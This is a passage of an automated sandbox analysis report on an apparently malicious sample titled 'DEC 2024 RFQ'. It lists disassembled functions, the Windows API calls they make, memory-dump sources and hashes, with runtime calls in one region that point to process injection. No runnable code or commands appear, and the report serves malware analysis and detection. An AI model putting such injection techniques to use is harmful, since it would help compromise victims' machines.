                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CALL
                                                                                                                      • API String ID: 0-4196123274
                                                                                                                      • Opcode ID: caef53be8c9aafc4f82e7d2b21a9dda79edb5af75cdabe42b53d2d22eb74da29
                                                                                                                      • Instruction ID: 83d8b7dd86784aa12bd67a5da04b08767ff384b0e85d37bea68b467202e87946
                                                                                                                      • Opcode Fuzzy Hash: caef53be8c9aafc4f82e7d2b21a9dda79edb5af75cdabe42b53d2d22eb74da29
                                                                                                                      • Instruction Fuzzy Hash: 26227970A08321DFDB24DF14D494B6AB7E1BF85300F14896DE88A9B362DB35EC45CB82
                                                                                                                      Function 00024C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: EA06
                                                                                                                      • API String ID: 4104443479-3962188686
                                                                                                                      • Opcode ID: 2adb4e5775ea2d26cd04414ccabcb44d94bbf8a0397bf82811ea57cdbb9cbc3d
                                                                                                                      • Instruction ID: 55d7be5808157e6bf4c2c61a47d34ee6a3d07e9d355f8f93920e225becd82c1d
                                                                                                                      • Opcode Fuzzy Hash: 2adb4e5775ea2d26cd04414ccabcb44d94bbf8a0397bf82811ea57cdbb9cbc3d
                                                                                                                      • Instruction Fuzzy Hash: 99415A31A041785BDF329B64FC917FE7FA69B46300F684475EC86EB287D6309D4487A1
                                                                                                                      Function 000247D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsThemeActive.UXTHEME ref: 00024834
                                                                                                                        • Part of subcall function 0004336C: __lock.LIBCMT ref: 00043372
                                                                                                                        • Part of subcall function 0004336C: DecodePointer.KERNEL32(00000001,?,00024849,00077C74), ref: 0004337E
                                                                                                                        • Part of subcall function 0004336C: EncodePointer.KERNEL32(?,?,00024849,00077C74), ref: 00043389
                                                                                                                        • Part of subcall function 000248FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00024915
                                                                                                                        • Part of subcall function 000248FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0002492A
                                                                                                                        • Part of subcall function 00023B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00023B68
                                                                                                                        • Part of subcall function 00023B3A: IsDebuggerPresent.KERNEL32 ref: 00023B7A
                                                                                                                        • Part of subcall function 00023B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,000E52F8,000E52E0,?,?), ref: 00023BEB
                                                                                                                        • Part of subcall function 00023B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00023C6F
                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00024874
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1438897964-0
                                                                                                                      • Opcode ID: 4c2e557b09d7fa174db4b392d17f8d5abfa4a9bebeb2b4511c04594545916653
                                                                                                                      • Instruction ID: dfcb1d680cc2b70e974c7bb457e340ccf1b0bc8f9738f8c0869652a7b7103823
                                                                                                                      • Opcode Fuzzy Hash: 4c2e557b09d7fa174db4b392d17f8d5abfa4a9bebeb2b4511c04594545916653
                                                                                                                      • Instruction Fuzzy Hash: ED11C0718087519BD700DF68EC4585EBBE8EF99B50F10491FF1449B2B2DB748604CB91
                                                                                                                      Function 00025C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00025821,?,?,?,?), ref: 00025CC7
                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00025821,?,?,?,?), ref: 0005DD73
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 019c29479e4145b55a6a7b049875b552d7b7c9e13984e644fe7c7719217e92b9
                                                                                                                      • Instruction ID: 610cb81b2f4c94097c4d846dbb80d137d1e076a490753778745694060d6983cb
                                                                                                                      • Opcode Fuzzy Hash: 019c29479e4145b55a6a7b049875b552d7b7c9e13984e644fe7c7719217e92b9
                                                                                                                      • Instruction Fuzzy Hash: 56019670244718BEF3700E24DC8AF7637ECAB0176AF208325BAD59A1E0D6B45C48CB54
                                                                                                                      Function 00040DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0004571C: __FF_MSGBANNER.LIBCMT ref: 00045733
                                                                                                                        • Part of subcall function 0004571C: __NMSG_WRITE.LIBCMT ref: 0004573A
                                                                                                                        • Part of subcall function 0004571C: RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,00000000,?,?,?,00040DD3,?), ref: 0004575F
                                                                                                                      • std::exception::exception.LIBCMT ref: 00040DEC
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00040E01
                                                                                                                        • Part of subcall function 0004859B: RaiseException.KERNEL32(?,?,?,000D9E78,00000000,?,?,?,?,00040E06,?,000D9E78,?,00000001), ref: 000485F0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3902256705-0
                                                                                                                      • Opcode ID: 8d26ed3fac80cc1c4e5711fcc3d66168eaf90f68c1a4e3c044e0e95a085bc6a0
                                                                                                                      • Instruction ID: 8f979f33818fad5a2667476922ca76b2d96394bb2c9621d7db0255df3d165344
                                                                                                                      • Opcode Fuzzy Hash: 8d26ed3fac80cc1c4e5711fcc3d66168eaf90f68c1a4e3c044e0e95a085bc6a0
                                                                                                                      • Instruction Fuzzy Hash: 71F0C8F190431D66DB10BAA9EC019DF7BEC9F01311F10487AFE04A6292DF709A94C2D9
                                                                                                                      Function 000455FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __lock_file_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 26237723-0
                                                                                                                      • Opcode ID: 58acb444373614dd045e16eeb223b9a76f4135ffd36656b2ffe06be51ac5ea5d
                                                                                                                      • Instruction ID: 7be00f121742dbea0f5ab45dae3c8f349820314f13e537688cbbc9b959611b9f
                                                                                                                      • Opcode Fuzzy Hash: 58acb444373614dd045e16eeb223b9a76f4135ffd36656b2ffe06be51ac5ea5d
                                                                                                                      • Instruction Fuzzy Hash: BB01F7F1C01A08EBCF12AFA48C064DE7BA1AF92322F458135F8141B193DB318A51DF99
                                                                                                                      Function 000453A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00048B28: __getptd_noexit.LIBCMT ref: 00048B28
                                                                                                                      • __lock_file.LIBCMT ref: 000453EB
                                                                                                                        • Part of subcall function 00046C11: __lock.LIBCMT ref: 00046C34
                                                                                                                      • __fclose_nolock.LIBCMT ref: 000453F6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2800547568-0
                                                                                                                      • Opcode ID: 37438f1e367c6de63dd5249b8f64f1e24e4ceebd3acdf302740e97d65990a265
                                                                                                                      • Instruction ID: 05352ffb567cd347f11e6a9208a3d19ee905b148d7a965729f48fe3784340de4
                                                                                                                      • Opcode Fuzzy Hash: 37438f1e367c6de63dd5249b8f64f1e24e4ceebd3acdf302740e97d65990a265
                                                                                                                      • Instruction Fuzzy Hash: 78F0F6F1800B009BD7206F648C067ED67F06F42377F248524A420AB1C3CBBC4A419B5A
                                                                                                                      Function 00028061 Relevance: 2.6, APIs: 2, Instructions: 54COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0002542F,?,?,?,?,?), ref: 0002807A
                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0002542F,?,?,?,?,?), ref: 000280AD
                                                                                                                        • Part of subcall function 0002774D: _memmove.LIBCMT ref: 00027789
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3033907384-0
                                                                                                                      • Opcode ID: 71ed6ce1103973b4bd74feb088db6c2ab0f73a29c95301e63a776210eecfdf0e
                                                                                                                      • Instruction ID: 2443d9e3d2fed73e2bbbae2474b8aa34755e9f4654931fa3705c48014c3c0ee2
                                                                                                                      • Opcode Fuzzy Hash: 71ed6ce1103973b4bd74feb088db6c2ab0f73a29c95301e63a776210eecfdf0e
                                                                                                                      • Instruction Fuzzy Hash: 7301A275201114BFEB246A72EC46FBB3B6DEF85360F10802AF905DE191DE3098008665
                                                                                                                      Function 0173A48D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0173ACBD
                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0173ACE1
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0173AD03
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2438371351-0
                                                                                                                      • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                      • Instruction ID: 9322c0f13cde1411c859ffd6cf9e27f895790b1731533b728e5d9d956c11b0e2
                                                                                                                      • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                      • Instruction Fuzzy Hash: A912DF24E14658C6EB24DF64D8507DEB232EF68300F10A0E9910DEB7A5E77A4F85CF5A
                                                                                                                      Function 00031FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ebca2d1651a807dafd9029bed147de3df2805da9b5d2bb07ea2f86dba0bd29bd
                                                                                                                      • Instruction ID: c2c5b96675bd216b7a3edb1d74a2b8a726bbf9497ca18c20a3bc9275ec81b1b8
                                                                                                                      • Opcode Fuzzy Hash: ebca2d1651a807dafd9029bed147de3df2805da9b5d2bb07ea2f86dba0bd29bd
                                                                                                                      • Instruction Fuzzy Hash: 6751A131A00614AFCF15EF68D991EAE77EAAF45310F148168F906AB393DB31ED04CB55
                                                                                                                      Function 00025AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00025B96
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FilePointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 973152223-0
                                                                                                                      • Opcode ID: 5931adc394f8a0da09bc6786382f3f6e1dfac38925da7ced19f209d2c07e9906
                                                                                                                      • Instruction ID: 7bd6eded7dcce6a0ec2a39376cd539b2b827f1c494e545ab652738a90fb779ea
                                                                                                                      • Opcode Fuzzy Hash: 5931adc394f8a0da09bc6786382f3f6e1dfac38925da7ced19f209d2c07e9906
                                                                                                                      • Instruction Fuzzy Hash: 34317071A00A25AFCB18CF6CD894AADF7B5FF88311F148629D81997710D770BD90CB95
                                                                                                                      Function 00040C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProtectVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 544645111-0
                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction ID: a5de4ff49f3921142e124fdb1c2eb77a74fc765c35cec2198a404b02d5948fa5
                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction Fuzzy Hash: 8131E0B0A00105DBC758DF18D4C4A69F7B6FB89300B2486A5E90AEB351DA31EDC1DBC8
                                                                                                                      Function 0005FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: 8df7d5d3e706dc72fc9a24b5856bddf57a2f32bd85221703e1399bc65816fdf7
                                                                                                                      • Instruction ID: 6f867c350023bfc4a7ccdceb4d216ac3e2cfa3df29433b45c03f091a233624a9
                                                                                                                      • Opcode Fuzzy Hash: 8df7d5d3e706dc72fc9a24b5856bddf57a2f32bd85221703e1399bc65816fdf7
                                                                                                                      • Instruction Fuzzy Hash: CF4137746083518FDB64DF24C444B2ABBE1BF45318F1988ACE99A8B362C736EC45CF52
                                                                                                                      Function 000259B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 37505df6ececef80821dd86c71f241db644dba638660f76c67217c8419f86494
                                                                                                                      • Instruction ID: 59721a99dad6746dde6470b0cad6c4709da42e3f20a19f94dbe5ac35066db15d
                                                                                                                      • Opcode Fuzzy Hash: 37505df6ececef80821dd86c71f241db644dba638660f76c67217c8419f86494
                                                                                                                      • Instruction Fuzzy Hash: E621C371900A19EBDB209F52EC856AF7FB8FB04312F21846BEC85D5111EBB094E4D75A
                                                                                                                      Function 00024DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00024BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00024BEF
                                                                                                                        • Part of subcall function 0004525B: __wfsopen.LIBCMT ref: 00045266
                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,000E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00024E0F
                                                                                                                        • Part of subcall function 00024B6A: FreeLibrary.KERNEL32(00000000), ref: 00024BA4
                                                                                                                        • Part of subcall function 00024C70: _memmove.LIBCMT ref: 00024CBA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1396898556-0
                                                                                                                      • Opcode ID: fefae274505016ddf869ed69ef714eb201757bf104d9ee04355ce486eadc8fc7
                                                                                                                      • Instruction ID: add1538820a2187e7fba187dcc69bb21b9f3ef235f10d00c12bac47185551def
                                                                                                                      • Opcode Fuzzy Hash: fefae274505016ddf869ed69ef714eb201757bf104d9ee04355ce486eadc8fc7
                                                                                                                      • Instruction Fuzzy Hash: 1F11E731600216ABDF21BFB0DC16FEE77A8AF44710F10842AF941AB183EF7199049B50
                                                                                                                      Function 0005FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: 139a02b14ff2e7fab814a8089fc268647f3710c82d82dac413c4997c38ef4525
